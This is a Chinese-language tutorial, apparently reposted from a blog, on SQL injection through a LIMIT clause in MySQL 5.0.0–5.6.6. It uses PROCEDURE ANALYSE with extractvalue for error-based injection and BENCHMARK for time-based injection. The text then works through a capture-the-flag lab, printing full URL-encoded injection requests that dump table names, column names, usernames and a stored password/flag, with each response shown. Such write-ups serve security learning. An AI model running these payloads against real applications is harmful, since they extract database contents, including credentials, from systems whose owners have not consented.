mysql 5.6.6_Mysql下Limit注入方法(此方法仅适用于5.0.0mysql5.6.6的版本)
SQL語(yǔ)句類(lèi)似下面這樣:(此方法僅適用于5.0.0
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT (注入點(diǎn))
問(wèn)題的關(guān)鍵在于,語(yǔ)句中有 order by 關(guān)鍵字,mysql 中在 order by 前面可以使用 union 關(guān)鍵字,所以如果注入點(diǎn)前面沒(méi)有 order by 關(guān)鍵字,就可以使用 union 關(guān)鍵字,但是現(xiàn)在的情況是,注入點(diǎn)前面有 order by 關(guān)鍵字。
我們先看看 mysql 5.x 的文檔中的 select 的語(yǔ)法:
1 SELECT
2 [ALL | DISTINCT | DISTINCTROW ]
3 [HIGH_PRIORITY]
4 [STRAIGHT_JOIN]
5 [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
6 [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
7 select_expr [, select_expr ...]
8 [FROM table_references
9 [WHERE where_condition]
10 [GROUP BY {col_name | expr | position}
11 [ASC | DESC], ... [WITH ROLLUP]]
12 [HAVING where_condition]
13 [ORDER BY {col_name | expr | position}
14 [ASC | DESC], ...]
15 [LIMIT {[offset,] row_count | row_count OFFSET offset}]
16 [PROCEDURE procedure_name(argument_list)]
17 [INTO OUTFILE 'file_name' export_options
18 | INTO DUMPFILE 'file_name'
19 | INTO var_name [, var_name]]
20 [FOR UPDATE | LOCK IN SHARE MODE]]
在LIMIT后面可以跟兩個(gè)函數(shù),PROCEDURE 和 INTO,INTO除非有寫(xiě)入shell的權(quán)限,否則是無(wú)法利用的,這里的重點(diǎn)是 PROCEDURE 關(guān)鍵字.MySQL默認(rèn)可用的存儲(chǔ)過(guò)程只有 ANALYSE。
嘗試用這個(gè)存儲(chǔ)過(guò)程:
mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure
ANALYSE支持兩個(gè)參數(shù),試試兩個(gè)參數(shù):
mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure
在 ANALYSE 中插入 sql 語(yǔ)句,sleep 沒(méi)有被執(zhí)行,可以使用報(bào)錯(cuò)注入:
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'
如果不支持報(bào)錯(cuò)注入的話(huà),還可以基于時(shí)間注入,直接使用sleep不行,需要用BENCHMARK代替:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
1.使用 PROCEDURE?ANALYSE:
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0%20PROCEDURE%20ANALYSE(1)%23&num=1
Can't use ORDER clause with this procedure
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
2.使用報(bào)錯(cuò)注入爆表:
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=8&num=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()))),1)%23
XPATH syntax error: ':article,user'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
得到表名:article,user
3.爆列:
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x61727469636c65))),1)%23%20&num=100%20%23
XPATH syntax error: ':id,title,contents,isread'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
得到article表的列名:id,title,contents,isread
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x75736572))),1)%23%20&num=100%20%23
XPATH syntax error: ':id,username,password,lastloginI'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
同樣得到user表的列名:id,username,password,lastloginI
4.爆字段:
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(username)%20from%20user))),1)%23%20&num=1
XPATH syntax error: ':user,admin,flag'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
通過(guò)查詢(xún)user表的username列,發(fā)現(xiàn)其中有一個(gè)字段是flag,那么直接讀取flag字段的內(nèi)容就可以了:
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(password)%20from%20user%20where%20username=0x666c6167))),1)%23%20&num=1
XPATH syntax error: ':myflagishere'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
得到flag:myflagishere
總結(jié)
以上是生活随笔為你收集整理的mysql 5.6.6_Mysql下Limit注入方法(此方法仅适用于5.0.0mysql5.6.6的版本)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: mysql t添加注释_mysql—添加
- 下一篇: mysql+sqlplus命令找不到_b